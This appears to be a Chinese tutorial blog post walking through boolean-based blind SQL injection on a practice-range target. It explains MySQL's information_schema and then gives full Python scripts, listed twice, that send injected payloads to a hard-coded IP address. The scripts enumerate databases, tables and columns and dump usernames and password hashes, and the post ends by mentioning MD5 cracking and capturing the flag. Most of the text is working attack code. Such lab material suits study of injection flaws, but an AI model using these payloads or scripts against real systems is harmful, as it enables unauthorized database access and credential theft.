先给大家普及一下
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。
information_schema数据库常用表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的
TABLES表:提供了关于数据库中的表的信息(包括视图)。如show tables from schemaname
COLUMNS表:提供了表中的列信息。如SHOW COLUMNS FROM FROM stormgroup.member`
这里找个靶场给大家演示一下
经过
‘
and 1=1
and 1=2
确定数据类型为int且存在注入
猜测查询语句为
select * from 数据库.表 where id =可控
查有多少个数据库
def database_number():
url = "http://219.153.49.228:49005/new_list.php?id=1 "
for i in range (0,9):
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
r = requests.get(url + payload)
if '各位平台用户' in r.text:
print('数据库的数量为:'+str(i))
break
ord(s) s为字符串 返回c的ascii码
mid(string,start,len)
mid(web,1,1)返回w
ifnull(a,b)不为空返回a 空返回b
count(aaa) 统计aaa的数量
distinct() 去重 假如你有两张一样的表 则返回一张即可
cast(a as b) 将a转换为b型数据
查具体有哪些数据库:
def database_names():
name = ''
names = ''
LEN = 0
for h in range(0, 5):
print(h)
for l in range(1,20):
url = "http://219.153.49.228:49005/new_list.php?id=1 "
for j in range(1, 18):
for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:49005/new_list.php?id=1 "
payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
r = requests.get(url + payload2)
# print(r)
#print(len(r.text))
if len(r.text) == 801:
name = name + i
print(name)
#print(type(name))
break
print('database_name:', name)
names = names + "\t" + name
name = ''
print(names)
查当前数据库:
def current_dbs():
name = ''
for j in range(1, 15):
for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
#print(url+'%23')
r = requests.get(url + payload2)
#print(r)
if '各位平台用户' in r.text:
name = name + i
print(name)
break
print('database_name:', name)
看stormgroup有多少张表
def tables_number():
for j in range(1, 10):
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
r = requests.get(url+payload)
if len(r.text) == 801:
print('该数据库的表数为:'+str(j))
break
爆表
def table_name():
name = ''
names = ''
for i in range(0, 2):
for h in range(1,10):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url+payload)
#print(r)
if len(r.text) == 801:
name = name + j
print(name)
# print(type(name))
break
print('table:'+name)
names = names + "\t" + name
name = ''
print('current database have:'+names)
查字段数量
def columns_number():
for i in range(1,5):
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
r = requests.get(url + payload)
#print(r)
if len(r.text) == 801:
print('当前表有'+str(i)+'个字段')
列字段
def columns_name():
name = ''
names = ''
for i in range(0, 3):
for h in range(1, 10):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url + payload)
# print(r)
if len(r.text) == 801:
name = name + j
print(name)
# print(type(name))
break
print('columns:' + name)
names = names + "\t" + name
name = ''
print('columns:' + names)
dump数据
def dump():
name = ''
names = ''
password = ''
passwords = ''
for i in range(0, 3):
for h in range(1, 34):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
url = "http://219.153.49.228:45953/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url + payload)
r1 = requests.get(url + payload1)
#print(r)
if len(r.text) == 801:
name = name + j
#print(name)
# print(type(name))
if len(r1.text) == 801:
password = password + j
#print(password)
# print(type(name))
print('username:' + name)
names = names + "\t" + name
name = ''
print('password:' + password)
passwords = passwords + "\t" + password
password = ''
#print('username:' + names)
print('password:'+ passwords)
md5解密
Capture the flag
全代码如下
__author__ = "星空下de青铜"
import requests
def database_number():
url = "http://219.153.49.228:49005/new_list.php?id=1 "
for i in range (0,9):
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
r = requests.get(url + payload)
if '各位平台用户' in r.text:
print('数据库的数量为:'+str(i))
break
def database_names():
name = ''
names = ''
LEN = 0
for h in range(0, 5):
print(h)
for l in range(1,20):
url = "http://219.153.49.228:49005/new_list.php?id=1 "
for j in range(1, 18):
for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:49005/new_list.php?id=1 "
payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
r = requests.get(url + payload2)
# print(r)
#print(len(r.text))
if len(r.text) == 801:
name = name + i
print(name)
#print(type(name))
break
print('database_name:', name)
names = names + "\t" + name
name = ''
print(names)
def current_dbs():
name = ''
for j in range(1, 15):
for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
#print(url+'%23')
r = requests.get(url + payload2)
#print(r)
if '各位平台用户' in r.text:
name = name + i
print(name)
break
print('database_name:', name)
def tables_number():
for j in range(1, 10):
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
r = requests.get(url+payload)
if len(r.text) == 801:
print('该数据库的表数为:'+str(j))
break
def table_name():
name = ''
names = ''
for i in range(0, 2):
for h in range(1,10):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url+payload)
#print(r)
if len(r.text) == 801:
name = name + j
print(name)
# print(type(name))
break
print('table:'+name)
names = names + "\t" + name
name = ''
print('current database have:'+names)
def columns_number():
for i in range(1,5):
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
r = requests.get(url + payload)
#print(r)
if len(r.text) == 801:
print('当前表有'+str(i)+'个字段')
def columns_name():
name = ''
names = ''
for i in range(0, 3):
for h in range(1, 10):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
url = "http://219.153.49.228:47875/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url + payload)
# print(r)
if len(r.text) == 801:
name = name + j
print(name)
# print(type(name))
break
print('columns:' + name)
names = names + "\t" + name
name = ''
print('columns:' + names)
def dump():
name = ''
names = ''
password = ''
passwords = ''
for i in range(0, 3):
for h in range(1, 34):
for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
url = "http://219.153.49.228:45953/new_list.php?id=1 "
payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
r = requests.get(url + payload)
r1 = requests.get(url + payload1)
#print(r)
if len(r.text) == 801:
name = name + j
#print(name)
# print(type(name))
if len(r1.text) == 801:
password = password + j
#print(password)
# print(type(name))
print('username:' + name)
names = names + "\t" + name
name = ''
print('password:' + password)
passwords = passwords + "\t" + password
password = ''
#print('username:' + names)
print('password:'+ passwords)
dump()
#columns_name()
#columns_number()
#table_name()
#tables_number()
#current_dbs()
#database_names()
#database_number()
结语:小编小菜鸡一个,花了一天才写出来的。里面也没有运用啥算法优化,在dump数据的时候会
很慢,建议运用二分法优化一下
其中查表数量啥的只是为了爆表的时候少循环几次,可以合二为一,把得到的表的数量传参到包表那里 或者弄个全局变量就ok了
小编实在等不及和大家分享了 后续有啥再和大家一起进步吧 ^_^